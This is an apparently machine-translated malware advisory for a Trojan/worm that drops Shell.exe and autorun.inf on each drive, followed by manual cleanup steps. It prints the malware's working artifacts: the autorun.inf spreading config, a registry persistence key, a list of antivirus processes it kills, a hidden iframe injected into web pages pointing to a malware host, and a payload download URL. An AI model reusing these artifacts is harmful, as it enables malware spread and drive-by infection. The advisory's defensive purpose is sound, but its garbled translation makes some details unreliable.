Each partition root directory releases Shell.exe,autorun.inf virus cleanup method _ virus killing

Virus Name: Trojan-psw.win32.magania.os Kabbah
Worm.Win32.Delf.ysa Rising
File changes:
Releasing files
C:\WINDOWS\system32\Shell.exe
C:\WINDOWS\system32\Shell.pci
C:\pass.dic

Each partition root is released
Shell.exe
Autorun.inf

Autorun.inf content
[Autorun]
Open=shell.exe
Shellexecute=shell.exe
Shell\auto\command=shell.exe

To modify the registry:
To create a startup project
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<Shell.exe><C:\WINDOWS\system32\Shell.exe>
[Hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall]
is 0
Destroy display hidden files
Other actions

Stopping the Server service
Find software\\microsoft\\windows\\currentversion\\uninstall\\ Password anti-theft expert comprehensive registry entries
Delete it if found

Terminate the following process or close the window
Kvxp. Kxp
Kvmonxp.kxp
RavMon.exe
Ravmonclass
Tflockdownmain
ZoneAlarm
Zaframewnd
VirusScan
Symantec AntiVirus
Duba
Wrapped Gift Killer
IceSword
PJF (USTC)

Eghost. Exe
PasswordGuard.exe
Mailmon. Exe
Kavpfw. Exe
Iparmor. Exe
_avp32. Exe..
_AVPCC. Exe
_AVPM. EXEAVP32. Exe
AVPCC. Exe
AVPM. Exe
Avp. Exe
NAVAPW32. Exe
NAVW32. Exe
Nod32kui.exe
Nod32kru.exe
PFW.exe
Kfw.exe
KAVPFW.exe
Vsmon.exe
Mcshield.exe
VsTskMgr.exe
NaPrdMgr.exe
UpdaterUI.exe
TBMon.exe
Scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
Kvxp.kxp
Kvmonxp.kxp
Kvcenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
Trojdie.kxp
360Safe.exe
360tray.kxp
FrogAgent.exe
FYFireWall.exe
Rundl132.exe
Logo_1.exe
Logo1_.exe

Traversing a partition that is not system-partitioned. ASP. exe. com. pif. exe. ASPX. COM. Htm. Html. Jsp. PHP files
Infection. Asp
. ASPX
. COM
. Htm
. Html
. Jsp
. Php
File
Add <iframe src=http://www.photoyahoo5.com width=0 to the back of the Height=0></iframe > 's Code

infection. exe. com. pif. exe
Adding 64516 bytes of content to its head belongs to the file head parasitic infection

Connect network download Hxxp://www.photoyahoo5.com/tools/01.exe to C packing directory

Purge method:
1. In Safe mode: (Reboot the system long press F8 until the prompt appears, then choose to enter Safe mode)

Copy the following code into Notepad and save as a 1.reg file
Windows Registry Editor Version 5.00
[Hkey_local_machine\software\microsoft\windows\currentversion\explorer\advanced\folder\hidden\showall]
"Regpath" = "software\\microsoft\\windows\\currentversion\\explorer\\advanced"
"Text" = "@shell32. dll,-30500"
"Type" = "Radio"
"CheckedValue" =dword:00000001
"ValueName" = "Hidden"
"DefaultValue" =dword:00000002
"Hkeyroot" =dword:80000001
"HelpID" = "shell.hlp#51105"



Double-click 1.reg to import this registry key

Double click on my Computer, tools, Folder Options, view, click to select "Show hidden files or folders" and clear the "Hide protected operating system files (recommended)" Front of the hook. When you are prompted to determine the changes, click Yes and then determine

and then delete
C:\WINDOWS\system32\Shell.exe
C:\WINDOWS\system32\Shell.pci
C:\pass.dic


And the Shell.exe under each partition.
Autorun.inf

2. Remove virus Startup Items (Start menu-run-enter "msconfig"-Start-delete items with Shell)
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
<Shell.exe><C:\WINDOWS\system32\Shell.exe>

3. Use anti-virus software to repair infected EXE files
4. Repair the modified Web page file